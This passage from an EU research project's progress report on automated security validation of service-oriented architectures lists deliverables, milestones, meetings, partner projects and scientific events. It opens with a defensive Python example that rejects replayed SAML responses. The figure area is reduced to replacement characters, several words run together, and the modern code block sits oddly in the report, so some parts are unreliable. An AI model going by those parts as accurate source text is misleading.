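        self._ids: "OrderedDict[str, float]" = OrderedDict()  # id -> expiry, oldest first

    def _evict_expired(self) -> None:
        now = self.clock()
        while self._ids and next(iter(self._ids.values())) <= now:
            self._ids.popitem(last=False)

    def issue(self) -> str:
        """Mint a fresh request ID, dropping the oldest outstanding one if the cap is reached."""
        self._evict_expired()
        if len(self._ids) >= self.max_size:
            self._ids.popitem(last=False)
        request_id = "_" + secrets.token_hex(16)  # xs:ID values must not start with a digit
        self._ids[request_id] = self.clock() + self.ttl
        return request_id

    def consume(self, in_response_to: str) -> bool:
        """True once, for a live ID this SP issued; False for unknown, expired or replayed values."""
        self._evict_expired()
        return self._ids.pop(in_response_to, None) is not None


def accept_response(store: PendingRequests, response: Dict[str, Optional[str]],
                    allow_idp_initiated: bool = False) -> bool:
    """Decide whether a (signature-checked) SAML response may establish a session.

    Without the InResponseTo check, a response the SP never asked for is
    indistinguishable from one answering a genuine request.
    """
    in_response_to = response.get("InResponseTo")
    if in_response_to is None:
        # Nothing to correlate with: an IdP-initiated (unsolicited) response.
        return allow_idp_initiated
    return store.consume(in_response_to)


if __name__ == "__main__":
    store = PendingRequests()
    rid = store.issue()
    print("fresh:", accept_response(store, {"InResponseTo": rid}))
    print("replay:", accept_response(store, {"InResponseTo": rid}))
    print("unsolicited:", accept_response(store, {}))
```

Whether unsolicited responses should be accepted at all is a per-deployment decision, which is why it is an explicit parameter here rather than a default: an SP that only ever starts SSO itself has no reason to accept a response carrying no InResponseTo.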


3.2 Resources

As discussed in detail in Section 6, the resources and corresponding costs are all in line with what was planned and estimated in the Description of Work, so no deviations have occurred and no countermeasures were required.


4 Deliverables and milestones tables

4.1 Deliverables list

As shown in Table 2, the workplan of the project comprises 25 deliverables, 3 of which were due in Period P2 in addition to Deliverable D6.1, which spans the overall lifetime of the project and is of type "O" as it comprises the activation and maintenance of the AVANTSSAR Website and the publication of the package of the AVANTSSAR Platform.

The two deliverables D1.4 (this deliverable) and D2.2 are of nature Report (R), while Deliverable D4.1 is of type "R&P" as it describes the development and prototypical implementation of the first version of the AVANTSSAR Validation Platform. The dissemination level is indicated using the standard codes, where PU = Public.

As shown in Table 2, the 4 deliverables due in Period 2 have been delivered in a timely fashion, considering the fact that D1.4 has been merged (in accordance with the Project Officer) with this report.

Brief descriptions of the individual deliverables are given in the Deliverable Summary Sheets in the following pages.


Table 2: Deliverables

Del. no. | Deliverable name | WP no. | Lead beneficiary | Nature | Dissemination level | Delivery date from Annex I (proj. month) | Delivered Yes/No | Actual/Forecast delivery date | Comments
---------|------------------|--------|------------------|--------|---------------------|-------------------------------------------|------------------|-------------------------------|---------
D1.4 | Progress/Assessment Report for Year 2 | 1 | UNIVR | R | PU | 12 (31.12.09) | Yes | | D1.4 has been merged (in accordance with the Project Officer) with this report
D2.2 | ASLan v.2 with static service and policy composition | 2 | ETH Zurich | R | PU | 18 (30.06.09) | Yes | 30.06.09 |
D4.1 | AVANTSSAR Validation Platform v.1 | 4 | UGDIST | R&P | PU | 24 (31.12.09) | Yes | 30.12.09 |
D6.1 | AVANTSSAR Website and Package | 6 | UNIVR | O | PU | 1–36 | Yes | | The website is being updated regularly


4.1.1 Deliverable D1.4

DELIVERABLE SUMMARY SHEET

Project Number: FP7-ICT-2007-1, Project No. 216471
Project Acronym: AVANTSSAR
Title: Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures
Deliverable no: D1.4
Title: First Progress/Assessment Report (now: Progress/Assessment Report for Year 2 (Period P2: 01.01.09 — 31.12.09))
Due date: 31.01.2010
Delivery Date: 31.01.2010
Short Description: Deliverable D1.4 has been merged (in accordance with the Project Officer) with this Periodic Progress Report, which covers the second year of the AVANTSSAR project. It consists of a publishable executive summary, of an overview of the project objectives for the period and of the work progress and the achievements during the period, of the deliverables and milestones, and of a summary of the project management including an explanation of the use of the resources and the corresponding financial statements.
Partners contributed: all
Made available to: public


4.1.2 Deliverable D2.2

DELIVERABLE SUMMARY SHEET

Project Number: FP7-ICT-2007-1, Project No. 216471
Project Acronym: AVANTSSAR
Title: Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures
Deliverable no: D2.2
Title: ASLan v.2 with static service and policy composition
Due date: 30.06.09
Delivery Date: 30.06.09
Short Description: Deliverable 2.2 describes ASLan v.2, the second version of the ASLan language for specifying security-sensitive service-oriented architectures, the associated security policies, and their trust and security properties. In particular, ASLan v.2 allows for the formal specification of static service and policy composition. ASLan v.2 borrows notions from procedural and object-oriented programming languages in order to be usable by those who are not experts in formal protocol/service specification languages. The following features of ASLan v.2 are in particular useful in formally modelling static services and policy compositions:

• Control flow constructs (e.g. while and if). These allow for specifyingservices in a concise manner using concepts familiar to most program-mers.

• Modularity via the notion of an entity. This allows for specifyingservices separately, and instantiating them multiple times or composingthem with other services. Moreover, modularity helps in localizingpolicies to individual services, and precisely mapping out their trustrelations.

• Annotated channels. These provide an intuitive notation for expressingproperties of communication channels, that are used both as serviceassumptions and service goals.

The new features of ASLan v.2 are put into practice by formalizing a selection of problem cases taken from Deliverable D5.1.
Partners contributed: UNIVR, ETH Zurich, UGDIST, IBM, IEAT, SAP, SIEMENS (principal editors). INRIA, UPS-IRIT, OpenTrust (secondary editors)
Made available to: public


4.1.3 Deliverable D4.1

DELIVERABLE SUMMARY SHEET

Project Number: FP7-ICT-2007-1, Project No. 216471
Project Acronym: AVANTSSAR
Title: Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures
Deliverable no: D4.1
Title: AVANTSSAR Validation Platform v.1
Due date: 31.12.09
Delivery Date: 30.12.09
Short Description: This deliverable describes the development and prototypical implementation of the AVANTSSAR Validation Platform, which we have implemented as a service-oriented architecture. The platform takes as input a policy stating the functional and security requirements of a goal service and a description of the available services (including a specification of their security-relevant behavior, possibly including the local policies they satisfy) and aims at building an orchestration of the available services that meets the security requirements stated in the policy.
The main components of the platform are the TS Orchestrator and the TS Validator. The TS Orchestrator tries to build an orchestration, i.e. a composition, of the available services in a way that is expected (but not yet guaranteed) to satisfy the input policy. The TS Validator automatically analyses the validation problem resulting from the TS Orchestrator output. Failed validation means the existence of vulnerabilities that need to be fixed; otherwise, the composition of the services is guaranteed to be secure, i.e. to meet the input policy.
We also describe the experimental results obtained by running the platform against a selection of problem cases taken from Deliverable D5.1 [AVA08c] formally specified in ASLan.
The main features that will be included in the next version of the platform are highlighted.
Partners contributed: UNIVR, ETH Zurich, INRIA, UPS-IRIT, UGDIST, IBM, IEAT (principal editors). OpenTrust, SAP, SIEMENS (secondary editors)
Made available to: public


4.1.4 Deliverable D6.1

DELIVERABLE SUMMARY SHEET

Project Number: FP7-ICT-2007-1, Project No. 216471
Project Acronym: AVANTSSAR
Title: Automated VAlidatioN of Trust and Security of Service-oriented ARchitectures
Deliverable no: D6.1
Title: AVANTSSAR Website and package
Due date: 01.01.08 – 31.12.10
Delivery Date: ongoing
Short Description: The website (www.avantssar.eu) is active and updated regularly. The AVANTSSAR package is in preparation.
Partners contributed: all
Made available to: public


4.2 Milestones list

The project comprises 6 major milestones, which provide its major decision points, and which are synchronized with the 6 project meetings. The 2 milestones of Period P2 are shown in Table 3. Both have been achieved, as verified during the second synchronization meeting (month 18) for MS3, and on month 24 (in particular, at the delivery of D4.1) and while writing this periodic progress report in preparation for the second review meeting (at month 26) for MS4.


Table 3: Milestones (and decision points)

Milestone no. | Milestone name | WPs no's. | Lead beneficiary | Delivery date from Annex I (proj. month) | Achieved Yes/No | Actual/Forecast delivery date | Comments
--------------|----------------|-----------|------------------|-------------------------------------------|-----------------|-------------------------------|---------
MS3 | ASLan v.2 (statically composed services and policies), Validator and Orchestrator prototypes, and First formalisation of problem cases | 2, 4, 5 | UGDIST | month 18 (second synchronization meeting) | Yes | month 18 |
MS4 | Reasoning techniques for ASLan v.2 specifications, Platform prototype, Assessment v.2, ASLan for industry | 1, 3, 4, 5 | UPS-IRIT | month 24 (second review meeting) | Yes | month 24 (and month 26) | The achievement of the milestone has been verified on month 24 (in particular, at the delivery of D4.1) and while writing this periodic progress report in preparation for the second review meeting (at month 26).


5 Project Management

5.1 Project Planning and Timetable (GANTT Chart)

A GANTT chart showing the scheduling of the workpackages and the progress made is given in Figure 5: it depicts the timelines of the single workpackages and their sub-workpackages, as well as the 7 planned project meetings (a kick-off meeting, 3 synchronization meetings attended by all consortium partners, and 3 project review meetings) and the principal additional meetings that took place in period P2. This chart is the updated version of the original chart given in the Description of Work (Annex I) and of the chart given in Deliverable D1.3 "Progress/Assessment Report for Year 1" [AVA08a].

5.2 Project Management and Coordination

Project management during the second project period was unproblematic. No problems occurred and thus no deviations from the planned deliverables and milestones were necessary, except for the minor, natural adjustments to the timetable (for the delivery of the deliverables and achievement of the milestones) described in the previous section, all carried out in accordance with the Project Officer. Given the complexity of the technical objectives, particular attention has been paid to the coordination of the activities and communication between project partners.

5.2.1 Project Meetings

Project meetings have played (and will play) a pivotal role in the coordinationand synchronization of activities among the partners, as they have fosteredcommunication between the beneficiaries and synergies and cross-fertilizationof approaches and results.

The meetings of Period P2 are listed in Section 6, specifying venues, dates, and participants, along with the costs incurred by the participants. For readability, we have divided them into three categories:

• General project meetings, which include the planned project meetingsas well as other meetings organized for the Consortium to discuss andwork on specific workpackages and deliverables,

• Working meetings, which are small to medium size meetings betweenproject participants to work on specific project topics.


Figure 5: GANTT chart showing the scheduling of the workpackages and the progress made.

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

���������������������������������������������

[Figure 5 (GANTT chart, months 1–36). Work packages and tasks plotted: WP1 Project Management; WP2 Modelling trust and security aspects of SOA (WP2.1 Initial ASLan, WP2.2 Extended ASLan, WP2.3 Final ASLan); WP3 Automated reasoning techniques (WP3.1 Sat. of ASLan P., WP3.2 Mod.-Ch. P. w.r.t. S., WP3.3 Attacker Models, WP3.4 Comp. Reas. for S.&P., WP3.5 Abs. for Comp. S.&P.); WP4 The AVANTSSAR validation platform (WP4.1 TS Orchestrator, WP4.2 TS Validator, WP4.3 Platform Integration); WP5 Proof of concept (WP5.1 Def. Pb. Cases, WP5.2 Form. Pb. Cases, WP5.3 Val. Pb. Cases, WP5.4 Assessment); WP6 Dissemination and industry migration (WP6.1 Dissemination, WP6.2 Migration industry, WP6.3 Migration Stand. Org.). Milestones marked on the month axis: kick-off meeting, 1st and 2nd modeling meetings, 1st, 2nd and 3rd sync meetings, WP2&WP3 meetings, WP3&WP4 meeting, WP2 meeting, WP4 meeting, 1st review meeting, 2nd review meeting, project workshop meeting, general meeting and 2nd progress-so-far review, final review meeting.]

Figure 5: GANTT Chart of the AVANTSSAR Project

FP7-ICT-2007-1Project No. 216471

D1.4: Progress/Assessment Report for Year 2 (Period P2: 01.01.09 —31.12.09) 53/165

• Participation in European and scientific events, which lists participation in conferences and other events for the dissemination of the project results, including events organized by the European Commission.

In addition to these physical meetings, a number of “unscheduled” virtual meetings have been organized regularly with the help of the SAP Connect Portal, an audio and web conferencing system that provides a virtual meeting room where participants can share files and work on them in real time. These meetings have proved to be a very useful (and cost-effective) means of sharing information, discussing research issues, and preparing project material. We will thus use the portal to hold virtual meetings on a regular basis until the end of the project.

5.2.2 Task-forces

The formation of task-forces (comprising experts from all the partners) has been a very effective coordination measure to tackle well-defined, critical technical issues, such as the definition of the ASLan and of the ISSLs, as well as the implementation and assessment of the first version of the AVANTSSAR Validation Platform.

5.2.3 Website

The website of the AVANTSSAR project is

www.avantssar.eu

and includes:

• A general introduction to the project: the objectives, the expected results, the milestones, the detailed description of the consortium and its position within the Seventh Framework Programme.

• Publications originating from the project, both in the scientific community and in the general press.

• A subpage about the AVANTSSAR Platform.

• Links to the forerunner projects AVISPA and AVISS.

• A number of relevant links: other projects, institutions and companies that are related to AVANTSSAR.


• An internal protected section, containing contact details, internal mailing lists, details about the meetings (slides, notes and so on) and other temporary technical information needed by the consortium.

• A protected section containing the deliverables and other documents for the European Commission.

• Links to events taking place in the context of the project: meetings,conferences, and workshops.

• News about the AVANTSSAR project, including, for instance, links to articles and a demo video about the serious vulnerability of the SAML-based Single Sign-On service offered by Google [ACC+08] that we discovered.

Besides the website, communication and information exchange among the members of the project is supported by a carefully organized and maintained central repository and a number of dynamically created mailing lists.

5.2.4 Mailing lists

The following mailing lists have proved to be very useful means of exchanging ideas and coordinating activities:

[email protected] is devoted to
– the exchange of information between the partners,
– the organization of consortium-wide editorial activities such as the writing of a deliverable, as well as
– general announcements such as organizing a project meeting or advertising a new project publication.

This mailing list comprises all the scientists from the partner groups.

[email protected] is devoted to the discussion between all the site leaders.

[email protected] is devoted to the discussion of administrative, financial, and management issues. This mailing list includes all the site leaders plus a restricted number of senior researchers and administration staff.

[email protected] is the address of the administrators of the project website, namely the members of UNIVR, with the support of members of UGDIST.


5.2.5 SVN Server

The use of an SVN (Subversion) server has proved to be a fundamental instrument for the management and sharing of project data. SVN allows for the concurrent management of (different versions of) files and has proved very valuable for the project: software and documents (e.g. deliverables and publications) are now routinely and effectively managed, shared and jointly edited via SVN by the AVANTSSAR personnel.

5.3 Use of foreground and dissemination activities

5.3.1 Project Workshops and Conferences, Lectures, Tutorials

The second project workshop took place in Verona, Italy, on January 14 and 15, 2010, in conjunction with the regular project synchronization meeting. Participants from all project partners presented summaries of their achievements during the second reporting period. (The workshop was originally planned for 2009 but has been co-located with the synchronization meeting to minimize costs and maximize attendance.)

As described in more detail in Deliverable D1.2 “Basic Dissemination and Use Plan”, a final Project Workshop is scheduled for 2010 and will be open to external participants (co-located with a one-day “Dissemination Workshop”).

Additionally, the members of AVANTSSAR have been playing (and will play) an active role in the organization of a number of scientific events. Subsection 5.4 lists the events that took place, or whose organization has begun, during the second reporting period. In particular, AVANTSSAR supports the ARSPA workshop series:

• ARSPA is a series of workshops on Automated Reasoning for Security Protocol Analysis that was started during the AVISPA project (the predecessor of AVANTSSAR) and that will be carried on in the context, and with the support, of AVANTSSAR.

• ARSPA-WITS’09: in 2009, ARSPA has again joined forces with the WITS workshop, in the context of the ETAPS 2009 conference (22-29 March, 2009, York, UK). The co-chairs of ARSPA-WITS’09 were Pierpaolo Degano (of the University of Pisa, and of the Sensoria project) and Luca Viganò of UNIVR. More information is available on the project’s website http://www.avantssar.eu/arspa-wits09/

• ARSPA-WITS’10: in 2010, ARSPA again joins forces with the WITS workshop, in the context of the ETAPS 2010 conference (Paphos, Cyprus, March 27-28, 2010). The co-chairs of ARSPA-WITS’10 are Alessandro Armando of UGDIST and Gavin Lowe (Oxford University). More information is available on the project’s website http://www.avantssar.eu/arspa-wits10/

Moreover, we have been presenting our work at international conferences and forums on computer security, software architectures, and automated reasoning, as illustrated by the AVANTSSAR publications and talks listed in Subsections 5.5 and 5.7.

The industrial partners have also been carrying out local dissemination, and the whole consortium has been involved in clustering and standardization activities. These activities are described in quite some detail in Deliverable D1.2 “Basic Dissemination and Use Plan”, so here we only briefly indicate some projects and organizations relevant to the on-going work (at international or national level) and with which information exchange might be beneficial.

5.3.2 European and international projects and working groups

Members of the AVANTSSAR consortium participate in (or are in close contact with the initiators and members of) several related European and international projects and working groups, including:

• COST Action IC0901: Rich-Model Toolkit – An Infrastructure for Reliable Computer Systems (Nov. 2009 – Oct. 2013). The action is relevant through its design of languages with rich modeling features, and through its work on decision procedures, including SAT checking. From the AVANTSSAR project, Marius Minea is the Management Committee member for Romania, and Alessandro Armando is participating from Italy.

• DEPLOY: Industrial deployment of system engineering methods providing high dependability and productivity. FP7 project, Feb 2008 – Jan 2012, http://www.deploy-project.eu/index.html. The DEPLOY project concerns developing critical systems by refinement using the Event-B formalism. The main focus is on embedded systems, but the project will also explore security aspects of such systems. ETH Zurich is the focal point for the security activities and can serve as a hub for collaboration here. Point of contact for DEPLOY: David Basin.

• IFIP WG 1.7 Theoretical Foundations of Security Analysis and Design, http://www.dsi.unive.it/IFIPWG1_7/. Luca Viganò of UNIVR is a member of the working group.


• MASTER: Managing Assurance, Security and Trust for sERvices. FP7 project, Feb 2008 – Jan 2011, http://www.master-fp7.eu/index.php.

• PrimeLife: Bringing sustainable privacy and identity management to future networks and services. FP7 project, Mar 2008 – Feb 2011, http://www.primelife.eu. The PrimeLife project is related in several regards. First of all, PrimeLife is concerned with improving privacy-friendly technologies such as IBM’s Identity Mixer, which is one of the major case studies in AVANTSSAR. We already have a close collaboration between these two projects at the IBM site. In particular, we discuss our formalization of the Identity Mixer directly with its developers. Moreover, PrimeLife is also related to questions of access control policies and their composition. The privacy-friendly credential-based access control language CARL has been developed jointly by AVANTSSAR and PrimeLife at IBM (see the WP6 description).

• R4eGov: Towards e-Administration in the large. FP6 project, Mar 2006 – Feb 2009, http://www.r4egov.eu.

• SENSORIA: Software Engineering for Service-Oriented Overlay Computers. FP6 project, Sep 2005 – Aug 2009, http://www.sensoria-ist.eu. Luca Viganò of UNIVR acted as an associated researcher of the Sensoria project.

• SPOCS: Simple Procedures Online for Crossborder Services. Siemens participates in the FP7 e-government project SPOCS, CIP-ICT PSP-2008-2 no. 238935, http://www.eu-spocs.eu/, started in June 2009. Among others, SPOCS specifies the security architecture for prototypical service portal implementations related to the EU Services Directive. SIEMENS is going to formalize and verify the security architecture using the AVANTSSAR toolset, whereby valuable feedback is anticipated in both directions between the projects.

• WASP: Wirelessly Accessible Sensor Populations. FP6 project, Sep 2006 – Feb 2010, http://www.wasp-project.org.

Luca Viganò of UNIVR and Volkmar Lotz and Alessandro Sorniotti of SAP represented AVANTSSAR and presented the project at the BLED conference “Towards a European approach to the Future Internet”, held in Bled, Slovenia, March 30 – April 2, 2008.


Some of the members of the AVANTSSAR team, including ETH Zurich, INRIA, SAP, SIEMENS, and UNIVR, also participate, at different levels, in the activities of the European Research Consortium in Informatics and Mathematics (ERCIM), in particular ERCIM’s Working Group on Security and Trust Management, which aims at steering the research of ERCIM institutions on a series of activities (e.g., research projects, workshops, dissemination of knowledge) for fostering the European research and development on security, trust and privacy in ICT. These are among the main issues of current and future research efforts for “security in Europe” (cf., for example, http://www.cordis.lu/security). We thus expect that the results of AVANTSSAR will be beneficial for this ERCIM WG, which will in turn provide a major forum for the peer-evaluation and dissemination of our results.

France

• INRIA: ACCESS is an INRIA ARC project that started in 2010 between Lille, Saclay and Nancy. ACCESS is concerned with security and access control for Web data exchange. It aims at defining automatic verification methods for checking properties of access control policies (ACPs) for XML, such as consistency, and for the comparison of ACPs. Formal tools from tree automata theory will be applied for this purpose.

• UPS-IRIT: Philippe Balbiani is the leader of ARA SSIA COPS. Lilac is also part of the ROSACE (Robots et systèmes, auto-adaptatifs, communicants et embarqués; robots and systems that are self-adaptive, communicating and embedded) project, which aims at studying and developing means to design, specify, implement and deploy a set of mobile autonomous communicating and cooperating robots with well-established properties, particularly in terms of safety, self-healability, ability to achieve a set of missions and self-adaptation in a dynamic environment. The project is focused on the associated software (models, algorithms and systems). It proposes to address in a systematic and convergent approach the robotics software levels and the specific constraints imposed on the middleware level corresponding to real-time embedded systems, as well as network and inter-communication level management. ROSACE will bring together a strong research consortium composed of research teams from three laboratories (CERT-ONERA, IRIT and LAAS-CNRS) for making real progress in this area: an active and central object, namely a fleet of cooperative robots, is critical for keeping the difficult and ambitious scientific and technical work well grounded in relevant realities and well focused on actual needs.


Germany

SIEMENS participates in:

• BITKOM AK (working group) SOA Technologies, http://www.bitkom.org/de/themen_gremien/18151.aspx

• CAST workshops on SOA Security, http://www.cast-forum.de/workshops/infos/103

• TeleTrusT project group SOA Security, http://teletrust.de

Italy

• UNIVR participates in the PRIN’07 project “SOFT—Tecniche formali orientate alla sicurezza” (security-oriented formal techniques), Sep 2008 – Aug 2010.

• UGDIST coordinates the PRIN’07 project “Integrating automated reasoning in model checking: towards push-button formal verification of large-scale and infinite-state systems”, Sep 2008 – Aug 2010.

Romania

• Practical Formal Verification Using Automated Reasoning and Model Checking. INTAS research grant 8144, Sep 2006 – May 2009, http://www.risc.uni-linz.ac.at/projects/intas

• CONQUERS: Continuous Quality Evaluation and Restructuring of Software. Romanian national research grant, Oct 2007 – Sep 2010, http://loose.upt.ro/conquers. Relevant to AVANTSSAR is a task on extraction and composition of component and service interfaces.

• IEAT has won a 20-month Romanian national grant (2009–2010) supplementing FP7 participation in AVANTSSAR. This grant allows IEAT to provide additional person-months to the project and to finance part of the participation in AVANTSSAR project meetings and conferences.

Switzerland

• ETH Zurich is involved in the project VerSePro (funded by the Swiss National Science Foundation SNSF) together with the Ecole Polytechnique Fédérale de Lausanne (EPFL). This 4-year project, which started in the autumn of 2005, aims at the development and verification of security and privacy protocols for wireless networks. We thus expect that it will be possible to re-use in AVANTSSAR some of the techniques developed in VerSePro and vice versa. Point of contact for VerSePro: David Basin.


• ETH Zurich is involved in the project ComposeSec (funded by the Hasler Foundation). This 3-year project, which started in September 2007, aims at analyzing complex protocol suites or services built by combining networked components. The goal of this project is to develop effective compositional methods, with accompanying tool support, to tackle this problem. This includes foundational work on bridging the gap between currently used security protocol models and high-level analysis models of composed services. Point of contact for ComposeSec: Cas Cremers.


5.4 Involvement of project participants in scientific events

Scientific events sponsored by AVANTSSAR

1. ARSPA
Workshop series on Automated Reasoning for Security Protocol Analysis.
Several project participants, rotating yearly.

2. ARSPA-WITS’09
Joint Workshop on “Automated Reasoning for Security Protocol Analysis and Issues in the Theory of Security”, affiliated with ETAPS 2009.
York, UK, March 28 and 29, 2009.
Luca Viganò (UNIVR) co-chair.
Luca Compagna (SAP) and Sebastian Mödersheim (IBM) PC members.

3. Special issue of the Journal of Automated Reasoning on “Computer Security: Foundations and Automated Reasoning” in connection with the “Joint Workshop on Foundations of Computer Security, Automated Reasoning for Security Protocol Analysis and Issues in the Theory of Security” (FCS-ARSPA-WITS’08).
Luca Viganò (UNIVR) co-editor.

4. ARSPA-WITS’10
Joint Workshop on “Automated Reasoning for Security Protocol Analysis and Issues in the Theory of Security”, affiliated with ETAPS 2010.
Paphos, Cyprus, March 27 and 28, 2010.
Alessandro Armando (UGDIST) co-chair.
Luca Viganò (UNIVR), Cas Cremers (ETH Zurich), Michael Rusinowitch (INRIA), Yannick Chevalier (UPS-IRIT), Sebastian Mödersheim (IBM), Luca Compagna (SAP) and Jorge Cuellar (SIEMENS) PC members.

Other scientific events

5. FCS
Workshop series on the Foundations of Computer Security.
Luca Viganò (UNIVR) chair of the Steering Committee.

6. FCS’09
Workshop on Foundations of Computer Security (affiliated with LICS’09).
Los Angeles, California, USA, August 10, 2009.
Luca Viganò (UNIVR) and Cas Cremers (ETH Zurich) PC members.


7. ADDCT’09
Workshop on Automated Deduction: Decidability, Complexity, Tractability (affiliated with CADE-22).
McGill University, Montreal, Canada, August 2–7, 2009.
Luca Viganò and Silvio Ranise (UNIVR) PC members.

8. ARES’09
International Dependability Conference.
Fukuoka, Japan, March 16–19, 2009.
Luca Viganò (UNIVR) PC member.

9. ESORICS’09
14th European Symposium on Research in Computer Security.
Saint-Malo, France, September 21–25, 2009.
Luca Viganò (UNIVR) and David Basin (ETH Zurich) PC members.

10. FIS’09
The Second Future Internet Symposium.
Berlin, Germany, September 1–3, 2009.
Luca Viganò (UNIVR) and Alessandro Armando (UGDIST) PC members.

11. FMWS’09
Second International Workshop on Formal Methods for Wireless Systems (satellite workshop of CONCUR 2009).
Bologna, Italy, September 1–4, 2009.
Luca Viganò (UNIVR) PC member.

12. SECRYPT’09
International Conference on Security and Cryptography.
Milan, Italy, July 7–10, 2009.
Luca Viganò (UNIVR) PC member.

13. SECURWARE’09
The Third International Conference on Emerging Security Information, Systems and Technologies.
Athens/Glyfada, Greece, June 18–23, 2009.
Luca Viganò (UNIVR) PC member.

14. STM’09
5th International Workshop on Security and Trust Management (in conjunction with ESORICS’09).
Saint-Malo, France, September 24–25, 2009.
Luca Viganò (UNIVR) and Cas Cremers (ETH Zurich) PC members.

15. AVOCS
Workshop on Automated Verification of Critical Systems.
Swansea University, UK, September 23–25, 2009.
Silvio Ranise (UNIVR) PC member.

16. AVOCS
Workshop on Automated Verification of Critical Systems.
University of Düsseldorf, Germany, September 20–23, 2010.
Silvio Ranise (UNIVR) PC member.

17. PAAR
FLoC/IJCAR’10 Workshop on Practical Aspects of Automated Reasoning.
Edinburgh, UK, July 2010.
Silvio Ranise (UNIVR) PC member.

18. FroCoS
International Symposium on Frontiers of Combining Systems.
Trento, Italy, September 16–18, 2009.
Silvio Ranise (UNIVR) PC member.

19. SMT
International Workshop on Satisfiability Modulo Theories (affiliated with CADE 2009).
McGill University, Montreal, Canada, August 2–3, 2009.
Silvio Ranise (UNIVR) PC member.

20. FTP
International Workshop on First-Order Theorem Proving (co-located with TABLEAUX 2009).
University of Oslo, Norway, July 6–7, 2009.
Silvio Ranise (UNIVR) and Michael Rusinowitch (INRIA) PC members.

21. SAC’09
24th ACM Symposium on Applied Computing.
Honolulu, USA, March 8–12, 2009.
David Basin (ETH Zurich) PC member.

22. ASIACCS’09
4th ASIA Computer and Communication Security Conference.
Sydney, Australia, March 2009.
David Basin (ETH Zurich) PC member.

23. iNetSec’09
Workshop on Open Research Problems in Network Security.
Zurich, Switzerland, April 2009.
David Basin (ETH Zurich) PC member.

24. WiSec’09
2nd ACM Conference on Wireless Network Security.
Zurich, Switzerland, May 2009.
David Basin (ETH Zurich) Conference Chair.

25. SecReT’09
4th International Workshop on Security and Rewriting Techniques.
New York, USA, July 2009.
David Basin (ETH Zurich) PC member.

26. EUROPKI’09
The Sixth European PKI Workshop.
Pisa, Italy, September 9–11, 2009.
Cas Cremers (ETH Zurich) PC member.

27. SAC SVT 2010
Software Verification and Testing Track at the ACM Symposium on Applied Computing.
Lausanne, Switzerland, March 22–26, 2010.
Mohammad Torabi Dashti (ETH Zurich) PC member.

28. ASIACCS’10
ACM Symposium on Information, Computer and Communications Security (ASIACCS).
Beijing, China, March 2010.
David Basin (ETH Zurich) Program Chair.
Michael Rusinowitch (INRIA) PC member.

29. CADE-22
22nd International Conference on Automated Deduction.
McGill University, Montreal, Canada, August 2–7, 2009.
Michael Rusinowitch (INRIA) PC member.

30. CRISIS
The 4th International Conference on Risks and Security of Internet and Systems 2009 (IEEE technical co-sponsorship in cooperation with ACM SIGSAC, supported by SEE).
Toulouse, France, October 19–22, 2009.
Michael Rusinowitch (INRIA) PC member.

31. SARSSI’09
Conférence sur la sécurité des architectures réseaux et des systèmes d’information (Conference on the Security of Network Architectures and Information Systems).
Luchon, France, June 22–26, 2009.
Michael Rusinowitch (INRIA) PC member.

32. 1st Luxembourg Day on Security and Reliability.
University Campus Kirchberg, Luxembourg City, Luxembourg, February 10, 2009.
Michael Rusinowitch (INRIA) PC member.

33. ASE 2010
25th IEEE/ACM International Conference on Automated Software Engineering.
Antwerp, Belgium, September 20–24, 2010.
Alessandro Armando (UGDIST) PC member.

34. IJCAR 2010
5th International Joint Conference on Automated Reasoning.
Edinburgh, Scotland, July 16–19, 2010.
Alessandro Armando (UGDIST) PC member.

35. AISC 2010
10th International Conference on Artificial Intelligence and Symbolic Computation.
Paris, France, July 5–6, 2010.
Alessandro Armando (UGDIST) PC member.

36. SecReT 2010
Workshop on Security and Rewriting Techniques.
Port Jefferson, New York, USA, July 10–11, 2009.
Yannick Chevalier (UPS-IRIT) PC member.

37. ARES 2010
The Fifth International Conference on Availability, Reliability and Security.
Krakow, Poland, February 15–18, 2010.
Sebastian Mödersheim (IBM) PC member.


38. FM’09
16th International Symposium on Formal Methods.
Eindhoven, the Netherlands, November 2–6, 2009.
Jorge Cuellar (SIEMENS) and Marius Minea (IEAT) PC members.

39. SAC SEC 2009
Security Track at the ACM Symposium on Applied Computing.
Honolulu, USA, March 8–12, 2009.
Giampaolo Bella and Luca Compagna (SAP) co-chairs.

40. SAC SEC 2010
Security Track at the ACM Symposium on Applied Computing.
Lausanne, Switzerland, March 22–26, 2010.
Luca Compagna and Alessandro Sorniotti (SAP) co-chairs.
Cas Cremers (ETH Zurich) PC member.


5.5 AVANTSSAR publications and drafts

During the second year, the project participants produced 30 papers published or currently in print about the project’s foreground, thus amounting to 49 papers since the start of the project. Moreover, 7 more papers are currently submitted and further papers are in preparation. Last but not least, 4 PhD theses have been completed on AVANTSSAR research.

AVANTSSAR publications

[1] H. Abdelnur, T. Avanesov, M. Rusinowitch, and R. State. Abusing SIP Authentication. Journal of Information Assurance and Security, 4(4):311–318, 2009.

[2] S. Anantharaman, H. Lin, C. Lynch, P. Narendran, and M. Rusinowitch. Unification modulo homomorphic encryption. In Proceedings of Frontiers of Combining Systems, 7th International Symposium (FroCoS 2009), LNCS 5749. Springer-Verlag, 2009.

[3] A. Armando, R. Carbone, and L. Compagna. LTL Model Checking for Security Protocols. Journal of Applied Non-Classical Logics, special issue on “Logic and Information Security”, vol. 19/4, pp. 403–429, 2009.

[4] A. Armando, E. Giunchiglia, and S. E. Ponta. Formal specification and automatic analysis of business processes under authorization constraints: An action-based approach. In G. Pernul, S. Fischer-Huebner, and C. Lambrinoudakis, editors, TrustBus’09: Proceedings of the 6th International Conference on Trust, Privacy and Security in Digital Business, pages 63–72. Springer-Verlag, 2009.

[5] A. Armando and S. E. Ponta. Model Checking of Security-sensitive Business Processes. In P. Degano and J. Guttman, editors, Proceedings of the 6th International Workshop on Formal Aspects in Security and Trust (FAST2009). Springer-Verlag. To appear.

[6] C. Arora and M. Turuani. Validating integrity for the ephemerizer’s protocol with CL-AtSe. In Papers Issued from the 2005–2008 French-Japanese Collaboration, LNCS 5458, pages 21–32. Springer-Verlag, 2009.

[7] W. Arsac, G. Bella, X. Chantry, and L. Compagna. Attacking Each Other. In 17th International Workshop on Security Protocols (IWSP 2009), LNCS. Springer-Verlag, 2009.


